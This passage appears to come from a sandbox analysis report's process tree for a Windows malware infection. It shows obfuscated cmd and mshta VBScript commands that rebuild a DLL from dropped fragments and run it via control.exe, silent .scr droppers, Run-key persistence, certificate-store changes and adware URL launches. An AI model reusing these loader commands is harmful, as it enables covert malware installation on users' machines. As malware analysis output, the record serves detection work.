                                                                                    12⤵
                                                                                      PID:7040
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
                                                                                        13⤵
                                                                                          PID:6644
                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                        "C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
                                                                                        12⤵
                                                                                          PID:2352
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
                                                                                            13⤵
                                                                                              PID:3796
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"
                                                                                                14⤵
                                                                                                  PID:4852
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" EChO "
                                                                                                  14⤵
                                                                                                    PID:6204
                                                                                                  • C:\Windows\SysWOW64\control.exe
                                                                                                    control.exe ..\QVNGP.I
                                                                                                    14⤵
                                                                                                      PID:6628
                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I
                                                                                                        15⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:6228
                                                                                                        • C:\Windows\system32\RunDll32.exe
                                                                                                          C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I
                                                                                                          16⤵
                                                                                                            PID:3400
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I
                                                                                                              17⤵
                                                                                                              • Loads dropped DLL
                                                                                                              PID:6608
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\1DTBW6qEdrVn7PjAWxlu36X_.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\1DTBW6qEdrVn7PjAWxlu36X_.exe" /mixtwo
                                                                                            8⤵
                                                                                              PID:6048
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 236
                                                                                                9⤵
                                                                                                • Program crash
                                                                                                PID:6648
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\L4ZFOrOoGmodzzY1lFutmoS6.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\L4ZFOrOoGmodzzY1lFutmoS6.exe"
                                                                                              8⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:6000
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\L4ZFOrOoGmodzzY1lFutmoS6.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\L4ZFOrOoGmodzzY1lFutmoS6.exe"
                                                                                                9⤵
                                                                                                  PID:6856
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\ocpOgOZkWULXx7YjUS5ZFbBf.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\ocpOgOZkWULXx7YjUS5ZFbBf.exe"
                                                                                                8⤵
                                                                                                • Adds Run key to start application
                                                                                                PID:2452
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2452 -s 1732
                                                                                                  9⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Program crash
                                                                                                  • Enumerates system info in registry
                                                                                                  PID:1172
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Vh92cj0r2UKOfPQgQ733mgxV.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Vh92cj0r2UKOfPQgQ733mgxV.exe"
                                                                                                8⤵
                                                                                                  PID:4788
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 236
                                                                                                    9⤵
                                                                                                    • Program crash
                                                                                                    • Checks processor information in registry
                                                                                                    • Enumerates system info in registry
                                                                                                    PID:6416
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\s0DC_nGwvVUmu0GRuA22pI2G.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\s0DC_nGwvVUmu0GRuA22pI2G.exe"
                                                                                                  8⤵
                                                                                                    PID:5828
                                                                                                    • C:\Users\Admin\AppData\Roaming\5359476.scr
                                                                                                      "C:\Users\Admin\AppData\Roaming\5359476.scr" /S
                                                                                                      9⤵
                                                                                                        PID:5544
                                                                                                      • C:\Users\Admin\AppData\Roaming\8456642.scr
                                                                                                        "C:\Users\Admin\AppData\Roaming\8456642.scr" /S
                                                                                                        9⤵
                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                        PID:5628
                                                                                                      • C:\Users\Admin\AppData\Roaming\5787138.scr
                                                                                                        "C:\Users\Admin\AppData\Roaming\5787138.scr" /S
                                                                                                        9⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:6124
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          10⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5428
                                                                                                      • C:\Users\Admin\AppData\Roaming\2699551.scr
                                                                                                        "C:\Users\Admin\AppData\Roaming\2699551.scr" /S
                                                                                                        9⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:5372
                                                                                                      • C:\Users\Admin\AppData\Roaming\5099076.scr
                                                                                                        "C:\Users\Admin\AppData\Roaming\5099076.scr" /S
                                                                                                        9⤵
                                                                                                          PID:4628
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\LW3X5qRkhDyQXyj0a9LDsZyP.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\LW3X5qRkhDyQXyj0a9LDsZyP.exe"
                                                                                                        8⤵
                                                                                                          PID:6412
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-NLTOH.tmp\LW3X5qRkhDyQXyj0a9LDsZyP.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-NLTOH.tmp\LW3X5qRkhDyQXyj0a9LDsZyP.tmp" /SL5="$502AE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\LW3X5qRkhDyQXyj0a9LDsZyP.exe"
                                                                                                            9⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            PID:5864
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-GDJMT.tmp\Adam.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-GDJMT.tmp\Adam.exe" /S /UID=2709
                                                                                                              10⤵
                                                                                                              • Drops file in Drivers directory
                                                                                                              • Adds Run key to start application
                                                                                                              • Drops file in Program Files directory
                                                                                                              PID:1036
                                                                                                              • C:\Program Files\Windows NT\NOOMXVPHCD\foldershare.exe
                                                                                                                "C:\Program Files\Windows NT\NOOMXVPHCD\foldershare.exe" /VERYSILENT
                                                                                                                11⤵
                                                                                                                  PID:7036
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\26-e976c-866-470a1-11c7e9bd7a98b\Vybykutyho.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\26-e976c-866-470a1-11c7e9bd7a98b\Vybykutyho.exe"
                                                                                                                  11⤵
                                                                                                                    PID:5228
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                      12⤵
                                                                                                                      • Adds Run key to start application
                                                                                                                      • Enumerates system info in registry
                                                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                      PID:6748
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffca57246f8,0x7ffca5724708,0x7ffca5724718
                                                                                                                        13⤵
                                                                                                                          PID:5192
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
                                                                                                                          13⤵
                                                                                                                            PID:5660
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
                                                                                                                            13⤵
                                                                                                                              PID:1340
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
                                                                                                                              13⤵
                                                                                                                                PID:852
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
                                                                                                                                13⤵
                                                                                                                                  PID:692
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                                                                                                                                  13⤵
                                                                                                                                    PID:4360
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
                                                                                                                                    13⤵
                                                                                                                                      PID:6928
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
                                                                                                                                      13⤵
                                                                                                                                        PID:6808
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
                                                                                                                                        13⤵
                                                                                                                                          PID:5676
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5784 /prefetch:8
                                                                                                                                          13⤵
                                                                                                                                            PID:1268
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5784 /prefetch:8
                                                                                                                                            13⤵
                                                                                                                                              PID:5480
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5828 /prefetch:2
                                                                                                                                              13⤵
                                                                                                                                                PID:1632
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1648 /prefetch:1
                                                                                                                                                13⤵
                                                                                                                                                  PID:5072
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
                                                                                                                                                  13⤵
                                                                                                                                                    PID:5840
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4420 /prefetch:8
                                                                                                                                                    13⤵
                                                                                                                                                      PID:7068
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
                                                                                                                                                      13⤵
                                                                                                                                                        PID:1008
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
                                                                                                                                                        13⤵
                                                                                                                                                          PID:5312
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
                                                                                                                                                          13⤵
                                                                                                                                                            PID:1564
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:1
                                                                                                                                                            13⤵
                                                                                                                                                              PID:2952
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
                                                                                                                                                              13⤵
                                                                                                                                                                PID:4620
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
                                                                                                                                                                13⤵
                                                                                                                                                                  PID:756
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
                                                                                                                                                                  13⤵
                                                                                                                                                                    PID:6972
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=644 /prefetch:1
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:5320
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1
                                                                                                                                                                      13⤵
                                                                                                                                                                        PID:5640
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
                                                                                                                                                                        13⤵
                                                                                                                                                                          PID:5420
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1996 /prefetch:8
                                                                                                                                                                          13⤵
                                                                                                                                                                            PID:2776
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:1
                                                                                                                                                                            13⤵
                                                                                                                                                                              PID:4488
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
                                                                                                                                                                              13⤵
                                                                                                                                                                                PID:6108
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:6548
                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ffca57246f8,0x7ffca5724708,0x7ffca5724718
                                                                                                                                                                                  13⤵
                                                                                                                                                                                    PID:4616
                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                                                                                  12⤵
                                                                                                                                                                                    PID:5348
                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffca57246f8,0x7ffca5724708,0x7ffca5724718
                                                                                                                                                                                      13⤵
                                                                                                                                                                                        PID:1708
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\19-74be6-061-84694-453917a71f909\Washishywale.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\19-74be6-061-84694-453917a71f909\Washishywale.exe"
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:4140
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet & exit
                                                                                                                                                                                        12⤵
                                                                                                                                                                                          PID:2848
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\Calculator%20Installation.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet
                                                                                                                                                                                            13⤵
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                            PID:5408
                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Calculator\Calculator 1.0.0\install\FD7DF1F\Calculator Installation.msi" SID=764 CID=764 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\Calculator%20Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633412281 SID=764 CID=764 SILENT=1 /quiet " SID="764" CID="764"
                                                                                                                                                                                              14⤵
                                                                                                                                                                                                PID:5920
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nhfrmu5n.22g\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                            12⤵
                                                                                                                                                                                              PID:1868
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\nhfrmu5n.22g\GcleanerEU.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\nhfrmu5n.22g\GcleanerEU.exe /eufive
                                                                                                                                                                                                13⤵
                                                                                                                                                                                                  PID:6452
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 236
                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                    • Program crash
